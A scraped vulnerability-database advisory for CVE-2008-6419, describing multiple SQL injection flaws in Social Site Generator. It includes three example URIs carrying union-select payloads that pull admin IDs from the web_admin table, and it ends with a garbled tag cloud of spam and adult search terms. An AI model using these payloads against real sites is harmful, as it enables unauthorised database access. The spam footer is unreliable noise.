about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Social Site Generator Multiple SQL Injection Vulnerabilities


Title Social Site Generator Multiple SQL Injection Vulnerabilities
Published 2008-05-31-12:00AM
Updated 2009-03-13-07:16PM
Class Input Validation Error
CVE   CVE-2008-6419
Remote  Yes
Local  No
Credit  DeAr Ev!L
Vulnerable  Social Site Generator Social Site Generator 0
Not Vulnerable  
Code  Attackers can use a browser to exploit these issues.The following example URIs are available:http://www.example.com/path/display_blog.php?sgc_id=-4+union+select+1,admin_id+from+web_admin
http://www.example.com/path/social_my_profile_download.php?scm_mem_id=-1+union+select+admin_id,2,3,4+from+web_admin
http://www.example.com/path/social_forum_subcategories.php?catid=-1+union+select+1,2,admin_id+from+web_admin
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 19:25:42 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.allind www.bazhou gzyjgarden 513cf.5d6d a.qsnook.c 200 /compo SignKorn qpopper 4. www.auto-t XXX Vidio Apache htt Is-securit News Searc indian por unblock fi mambo Remo My Hot Ass picture of www.auto-t sexy open My Hot Ass JOB sexonline. php-nuke 2 www.teenam 22904.c components modules/Fo TAGS.PHP cex ph proxy f HER PORN V Microsof I unlock beb www bolly News Searc &a cmps www.vip163 lo707l malaysia Www.phoero t597t www.sexy . lo805l www sex an open sll news for c Asia4you.c Www.free s